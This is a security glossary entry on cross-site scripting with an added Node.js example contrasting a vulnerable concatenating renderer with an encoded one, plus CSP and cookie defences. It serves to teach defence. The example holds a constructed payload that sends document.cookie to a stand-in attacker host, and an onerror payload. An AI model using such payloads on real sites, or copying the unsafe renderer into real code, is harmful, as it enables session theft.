Attacks & Threats
Cross-Site Scripting (XSS)
Also known as: XSS
Definition
A web vulnerability that allows attackers to inject malicious scripts into pages viewed by other users, executing in the victim's browser under the site's origin.
Cross-Site Scripting (XSS) occurs when a web application places untrusted input into a response (or, for DOM-based XSS, writes it into the live page) without encoding it for the context in which it lands, so attacker-controlled JavaScript runs in the victim's browser with the site's origin and session. The three main classes are reflected XSS (the payload arrives in a request and is echoed back in the response, typically delivered via a crafted link), stored XSS (the payload is persisted server-side, e.g. in a comment, and served to every subsequent visitor), and DOM-based XSS (client-side script reads attacker-controlled data such as location.hash and writes it to a dangerous sink such as innerHTML, so the server never has to reflect anything). Because the injected script runs as the victim, a successful XSS can hijack the session or exfiltrate tokens, read or modify page content, deliver malware, and issue authenticated state-changing requests that defeat CSRF protections, since the script can read the anti-CSRF token from the page. Defences include context-aware output encoding (HTML body, attribute, JavaScript and URL contexts each need different encoding), a strict Content-Security-Policy that disallows inline script, framework templating that escapes by default, HttpOnly and SameSite cookie attributes to limit what a payload can steal or do, and input validation as defence in depth.
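An added example, not from the glossary: a Node.js search page rendered two ways (string concatenation versus context-aware encoding), a URL-context check that entity encoding alone cannot provide, and the CSP and cookie attributes used as defence in depth. The hostnames, payloads and session token are constructed for the demonstration.

```javascript
// Added example (not part of the original glossary). Runs under Node.js with no dependencies.

// Entity-encode a value for the HTML element-content and double-quoted attribute contexts.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: the search query is concatenated into the response verbatim (reflected XSS).
function renderResultsUnsafe(query) {
  return `<h1>Results for: ${query}</h1>`;
}

// Hardened: same template, but the untrusted value is encoded for the element-content
// context it is interpolated into, so tags and attribute quotes become inert text.
function renderResultsSafe(query) {
  return `<h1>Results for: ${escapeHtml(query)}</h1>`;
}

// URL context: "javascript:alert(1)" contains no characters that escapeHtml touches, so an
// href needs a scheme allow-list before encoding. Unparseable or non-http(s) URLs are dropped.
function renderProfileLink(url) {
  let parsed;
  try {
    parsed = new URL(url);
  } catch {
    return '<a href="#">profile</a>';
  }
  if (parsed.protocol !== 'https:' && parsed.protocol !== 'http:') {
    return '<a href="#">profile</a>';
  }
  return `<a href="${escapeHtml(parsed.href)}">profile</a>`;
}

// Defence in depth: a script-src without 'unsafe-inline' stops an injected inline <script>
// even where encoding was missed, and HttpOnly keeps document.cookie empty for a payload.
function securityHeaders(sessionToken) {
  return {
    'Content-Security-Policy':
      "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'",
    'Set-Cookie': `session=${sessionToken}; HttpOnly; Secure; SameSite=Lax; Path=/`,
  };
}

// Constructed payloads (attacker.example is a made-up host).
const COOKIE_THIEF = '<script>fetch("https://attacker.example/?c="+document.cookie)</script>';
const EVENT_HANDLER = '<img src=x onerror="alert(document.domain)">';

console.log('unsafe :', renderResultsUnsafe(COOKIE_THIEF));
console.log('safe   :', renderResultsSafe(COOKIE_THIEF));
console.log('safe   :', renderResultsSafe(EVENT_HANDLER));
console.log('link   :', renderProfileLink('javascript:alert(1)'));
console.log('link   :', renderProfileLink('https://example.org/u/42'));
console.log('headers:', securityHeaders('deadbeef'));
```

The unsafe renderer returns the payload byte-for-byte, so the browser parses it as markup; the safe one returns the same page with `&lt;script&gt;` in place of the tag. Note that the link helper rejects by scheme rather than by pattern-matching the string, which is what keeps encoded or case-varied `javascript:` forms from slipping through.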
Examples
- A stored XSS payload in a forum post steals session cookies from every user who views the thread.
- A reflected XSS in a search parameter executes JavaScript supplied by an attacker via a crafted link.
Related terms
Cross-Site Request Forgery (CSRF)
A web attack that forces an authenticated user's browser to send unwanted requests to a vulnerable site, causing state-changing actions without consent.
Content Security Policy (CSP)
Content Security Policy (CSP) — definition coming soon.
Session Hijacking
An attack that takes over a victim's authenticated session by stealing or forging the session identifier so the attacker can act as the user without their credentials.
Input Validation
Input Validation — definition coming soon.
Output Encoding
Output Encoding — definition coming soon.
OWASP Top 10
OWASP Top 10 — definition coming soon.